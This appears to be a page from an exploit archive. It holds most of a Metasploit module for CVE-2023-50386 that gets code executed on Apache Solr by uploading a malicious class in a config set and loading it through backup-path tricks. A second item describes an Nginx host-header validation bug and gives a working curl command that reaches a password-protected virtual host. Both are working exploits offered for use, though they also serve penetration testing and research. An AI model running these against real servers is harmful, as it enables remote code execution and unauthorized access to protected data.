data.dig('error', 'msg')<br /> fail_with(Failure::UnexpectedReply, "Failed to upload configuration. Target responded with error: #{data['error']['msg']}")<br /> else<br /> fail_with(Failure::UnexpectedReply, "Failed to upload configuration: #{conf_name} to the target")<br /> end<br /> res<br /> end<br /><br /> def create_collection(collection_name, configuration_name)<br /> solr_get({<br /> 'uri' => normalize_uri(target_uri.path, 'admin', 'collections'),<br /> 'method' => 'GET',<br /> 'auth' => @auth_string,<br /> 'vars_get' => {<br /> 'action' => 'CREATE',<br /> 'name' => collection_name,<br /> 'numShards' => 1,<br /> 'replicationFactor' => 1,<br /> 'wt' => 'json',<br /> 'collection.configName' => configuration_name<br /> }<br /> })<br /> end<br /><br /> def backup_collection(collection_name, location, backup_name)<br /> res = solr_get({<br /> 'uri' => normalize_uri(target_uri.path, 'admin', 'collections'),<br /> 'method' => 'GET',<br /> 'auth' => @auth_string,<br /> 'vars_get' => {<br /> 'action' => 'BACKUP',<br /> 'collection' => collection_name,<br /> 'location' => location,<br /> 'name' => backup_name<br /> }<br /> })<br /><br /> fail_with(Failure::UnexpectedReply, 'No response from the target') unless res<br /><br /> data = res.get_json_document<br /><br /> if data.dig('responseHeader', 'status') == 0<br /> print_good('Backed up collection successfully')<br /> elsif data.dig('error', 'msg')<br /> fail_with(Failure::UnexpectedReply, "Failed to Backup configuration. Target responded with error: #{data['error']['msg']}")<br /> else<br /> fail_with(Failure::UnexpectedReply, "Failed to create collection: #{collection_name} successfully")<br /> end<br /> res<br /> end<br /><br /> def cleanup<br /> print_status('Cleaning up...')<br /><br /> # Clean up collections and configurations<br /> # Delete the collection first then the configs or you'll get the following error:<br /> # "Can not delete ConfigSet as it is currently being used by collection [PchuSaNJ]"<br /> if @collection_res&.code == 200<br /> delete_collection_res = solr_get({<br /> 'uri' => normalize_uri(target_uri.path, 'admin', 'collections'),<br /> 'method' => 'GET',<br /> 'auth' => @auth_string,<br /> 'vars_get' => {<br /> 'action' => 'DELETE',<br /> 'name' => @collection1_name<br /> }<br /> })<br /> print_error("Unable to delete collection: #{@collection1_name}") unless delete_collection_res&.code == 200<br /> end<br /><br /> if @conf1_res&.code == 200<br /> delete_conf1_res = solr_get({<br /> 'uri' => normalize_uri(target_uri.path, 'admin', 'configs'),<br /> 'method' => 'GET',<br /> 'auth' => @auth_string,<br /> 'vars_get' => {<br /> 'action' => 'DELETE',<br /> 'name' => @configuration1_name<br /> }<br /> })<br /> print_error("Unable to delete config: #{@configuration1_name}") unless delete_conf1_res&.code == 200<br /> end<br /><br /> if @conf2_res&.code == 200<br /> delete_conf2_res = solr_get({<br /> 'uri' => normalize_uri(target_uri.path, 'admin', 'configs'),<br /> 'method' => 'GET',<br /> 'auth' => @auth_string,<br /> 'vars_get' => {<br /> 'action' => 'DELETE',<br /> 'name' => @configuration2_name<br /> }<br /> })<br /> print_error("Unable to delete config: #{@configuration2_name}") unless delete_conf2_res&.code == 200<br /> end<br /> end<br /><br /> def exploit<br /> @collection1_name = Rex::Text.rand_text_alpha(8)<br /> @configuration1_name = Rex::Text.rand_text_alpha_lower(8)<br /> @collection2_name = Rex::Text.rand_text_alpha(8)<br /><br /> # Zip up conf1<br /> conf1_zip = create_zip<br /> conf1_zip.add_file('SourceParser.class', go_go_gadget(@configuration1_name))<br /> conf1_zip.add_file('solrconfig.xml', File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-50386', 'solrconfig.xml')))<br /><br /> # Upload conf1<br /> @conf1_res = upload_conf(@configuration1_name + '.zip', conf1_zip.pack, @configuration1_name)<br /><br /> # Create collection from conf1<br /> @collection_res = create_collection(@collection1_name, @configuration1_name)<br /><br /> fail_with(Failure::UnexpectedReply, 'No response from the target') unless @collection_res<br /> data = @collection_res.get_json_document<br /> if @collection_res.code == 200 && data['responseHeader']['status'] == 0<br /> vprint_good('Created collection successfully')<br /> elsif data['error']['msg']<br /> fail_with(Failure::UnexpectedReply, "Failed to upload configuration. Target responded with error: #{data['error']['msg']}")<br /> else<br /> fail_with(Failure::UnexpectedReply, "Failed to create collection: #{collection_name} successfully")<br /> end<br /><br /> # Backup collection and export conf1<br /> location = '/var/solr/data/'<br /> backup_name = "#{@collection2_name}_shard1_replica_n1"<br /> backup_collection(@collection1_name, location, backup_name)<br /><br /> # Now you need to export it again through the backup and interface `collection1` note the changes in `location` and `name`:<br /> location = "/var/solr/data/#{backup_name}"<br /> backup_name = 'lib'<br /> backup_collection(@collection1_name, location, backup_name)<br /><br /> # Zip up conf2<br /> conf2_zip = create_zip<br /> editted_solrconfig = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-50386', 'solrconfig.xml'))<br /> editted_solrconfig = editted_solrconfig.gsub('</config>', " <valueSourceParser name=\"myfunc\" class=\"zk_backup_0.configs.#{@configuration1_name}.SourceParser\" />\n</config>")<br /> conf2_zip.add_file('solrconfig.xml', editted_solrconfig)<br /><br /> # Upload conf2<br /> @configuration2_name = Rex::Text.rand_text_alpha(8)<br /> @conf2_res = upload_conf('conf2.zip', conf2_zip.pack, @configuration2_name)<br /><br /> # Attempt to create a collection from conf2 which will load the SourceParser.class we uploaded as a port of the<br /> # first conf1 which will then cause an error as it executes our malicious class (the collection does not get created)<br /> res = create_collection(@collection2_name, @configuration2_name)<br /><br /> fail_with(Failure::UnexpectedReply, 'No response from the target') unless res<br /> data = res&.get_json_document<br /> if res.code == 400 && data['error']['msg'] == "Underlying core creation failed while creating collection: #{@collection2_name}"<br /> print_good('Successfully dropped the payload')<br /> else<br /> fail_with(Failure::UnexpectedReply, "Failed to create collection: #{@configuration2_name} successfully")<br /> end<br /> end<br />end<br /></code></pre>
<pre><code># Nginx =< 1.25.5 $host variable validation bug<br /><br />## Intro:<br /><br />In the "Host" header sent to Nginx web server you can't just insert a dot or something like that, because a filtering rules exists there. <br />The ngx_http_validate_host function is responsible for filtering (https://github.com/nginx/nginx/blob/master/src/http/ngx_http_request.c#L2145).<br /><br />## What it validates:<br /><br />+ two dots in a row are not allowed<br />+ colon and everything after it are stripped off<br />+ if "Host" header starts with "[", then after "]" everything is deleted<br />+ path separators are not allowed<br />+ cannot send chars ≤ 0x20 and == 0x7f<br />+ if there is a dot at the end, it is removed<br />+ if after all deletions the host length is zero, error occurs<br /><br />## The bug itself: <br /><br />dot_pos can be greater than host_len, if the last dot is included in the strip, then the last unstripped character (first dot in this case) is not deleted.<br /><br />So, if "Host" header payload is .:. , the colon and dot after it are stripped, but the first dot remains untouched and Nginx $host variable now contains only single dot character, what can't be done in the normal conditions.<br /><br />## Vulnerable Nginx server configuration example:<br /><br />server {<br /> root /sites/$host;<br /> index index.html;<br /> server_name _;<br /><br /> location / {<br /> try_files $uri $uri/ =404;<br /> }<br />}<br /><br />server {<br /> server_name "";<br /><br /> location / {<br /> return 418 "I'm a teapot.";<br /> }<br />}<br /><br />server {<br /> root /sites/protected-host.example.com;<br /> index flag.html;<br /> server_name protected-host.example.com;<br /> auth_basic "Protected File Storage";<br /> auth_basic_user_file /.htpasswd;<br /><br /> location / {<br /> try_files $uri $uri/ =404;<br /> }<br />}<br /><br />## Exploit (unauthorized access to password-protected host in this case):<br /><br />curl -H "Host: .:." http://protected-host.example.com/protected-host.example.com/flag.html<br /><br />P.S.<br />The bug was sent to security-alert@nginx.org, but the Nginx dev team said that ngx_http_validate_host function is a filter against fools and not a security bug at all, so it was decided to make it as a task on CTF Tinkoff contest.<br /><br /><br /><br /></code></pre>
Archives
Categories
- All Exploits 4095
- Remote Code Execution
- SQL Injection
- Command Injection
- Local File Inclusion
- Cross Site Scripting
- Privilege Escalation
- Denial Of Service
- Authentication Bypass
- Buffer Overflow